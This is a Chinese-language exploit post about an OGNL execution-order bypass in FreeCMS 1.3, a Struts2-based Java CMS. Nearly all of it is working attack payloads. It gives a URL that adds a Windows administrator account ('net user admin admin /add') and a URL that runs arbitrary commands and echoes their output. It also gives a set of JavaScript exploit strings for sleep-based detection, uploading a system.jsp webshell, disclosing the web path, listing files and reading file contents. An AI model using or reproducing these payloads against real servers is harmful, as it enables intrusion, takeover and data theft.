开源免费java CMS - FreeCMS1.3-数据对象-mail 

项目地址:https://code.google.com/p/freecms/

提交的action:

:8080/ff/login_login.do?user.loginname=EXP


FreeCms 命令执行(Ognl执行顺序绕过漏洞)


FreeCms 命令执行(Ognl执行顺序绕过漏洞)



 

添加帐号:

:8080/ff/login_login.do?user.loginname=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec('net%20user%20admin%20admin%20/add%27%29%29%28meh%29&z[%28user.loginname%29%28%27meh%27%29]=true


 

执行命令:


:8080/ff/login_login.do?user.loginname=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=%20new%20java.lang.Boolean(false),%23_memberAccess[%22allowStaticMethodAccess%22]=new%20java.lang.Boolean(true),%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[1000],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%23response=@org.apache.struts2.ServletActionContext@getResponse(),%23response.getWriter().println(%23result))&z[(user.loginname)('meh')]=true&cmd=cmd%20/c%20set


FreeCms 命令执行(Ognl执行顺序绕过漏洞)


 

其他EXP片段

var TEST_SLEEP_EXP = "('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(d)(('@java.lang.Thread@sleep([5000])')(d))"; //Exp1 检测是否存在漏洞 var TEST_SLEEP_EXP_2 = "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Thread@sleep([5000]))%2b'";//Exp2 检测是否存在漏洞 var TEST_SLEEP_EXP_3 = "%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,@java.lang.Thread@sleep([5000]))(meh%29&z[%28foo%29%28%27meh%27%29]=true"//Exp3 检测是否存在漏洞 var TEST_UPLOAD_SHELL = "('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i12)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i13)(('\\43xman.getWriter().println(\\43req.getServletContext().getRealPath(%22\\u005c%22))')(d))&(i2)(('\\43fos\\75new\\40java.io.FileOutputStream(new\\40java.lang.StringBuilder(\\43req.getRealPath(%22\\u005c%22)).append(@java.io.File@separator).append(%22system.jsp%22).toString())')(d))&(i3)(('\\43fos.write(\\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\\43fos.close()')(d))&t="; var TEST_EXECUTE_CMD_EXP = "('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\\43webRootzpro\\75@java.lang.Runtime@getRuntime().exec(\\43req.getParameter(%22cmd%22))')(d))&(i)(('\\43webRootzproreader\\75new\\40java.io.DataInputStream(\\43webRootzpro.getInputStream())')(d))&(i01)(('\\43webStr\\75new\\40byte[[100]]')(d))&(i1)(('\\43webRootzproreader.readFully(\\43webStr)')(d))&(i111)(('\\43webStr12\\75new\\40java.lang.String(\\43webStr)')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(\\43webStr12)')(d))&(i99)(('\\43xman.getWriter().close()')(d))&cmd=cmd%20/c%20"; var TEST_EXECUTE_CMD_EXP2 = "'%2b(%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[[100]],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%23response=@org.apache.struts2.ServletActionContext@getResponse(),%23response.getWriter().println(%23result))%2b'&cmd=cmd%20/c%20" var TEST_GET_WEB_PATH = "('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(\\43req.getRealPath(%22\\u005c%22))')(d))&(i99)(('\\43xman.getWriter().close()')(d))"; var TEST_GET_WEB_PATH2 = "'%2b(%23_memberAccess[%22allowStaticMethodAccess%22]=true,@org.apache.struts2.ServletActionContext@getResponse().getWriter().println(@org.apache.struts2.ServletActionContext@getRequest().getRealPath(%22/%22)))%2b'"; var TEST_FILES_LIST = "('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(@java.io.File@listRoots()[fd_list])')(d))&(i99)(('\\43xman.getWriter().close()')(d))"; //文件遍历 //var TEST_FILES_LIST = "('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('\\43files\\75new\\40java.lang.StringBuilder(@java.io.File@listRoots()[4].listFiles()[0]).append(%22[isDirectory]%22).append(@java.io.File@listRoots()[4].listFiles()[0].isDirectory())')(d))&(i95)(('\\43xman.getWriter().println(\\43files)')(d))&(i99)(('\\43xman.getWriter().close()')(d))"; //文件遍历 var TEST_GET_FILE_CONTENT = "('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i1)(('\\43dis\\75new\\40java.io.DataInputStream(new\\40java.io.FileInputStream(@java.io.File@listRoots()[[dname]].listFiles()[fname]))')(d))&(i2)(('\\43dos\\75new\\40java.io.DataOutputStream(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())')(d))&(i3)(('\\43buff\\75new\\40byte[[bsize]]')(d))&(i4)(('\\43dis.skipBytes(0)')(d))&(i5)(('\\43size\\75\\43dis.read(\\43buff)')(d))&(i6)(('\\43dis.close()')(d))&(i7)(('\\43dos.writeInt(\\43size)')(d))&(i95)(('\\43dos.write(\\43buff\\u002c0\\u002c\\43size)')(d))&(i99)(('\\43dos.close()')(d))";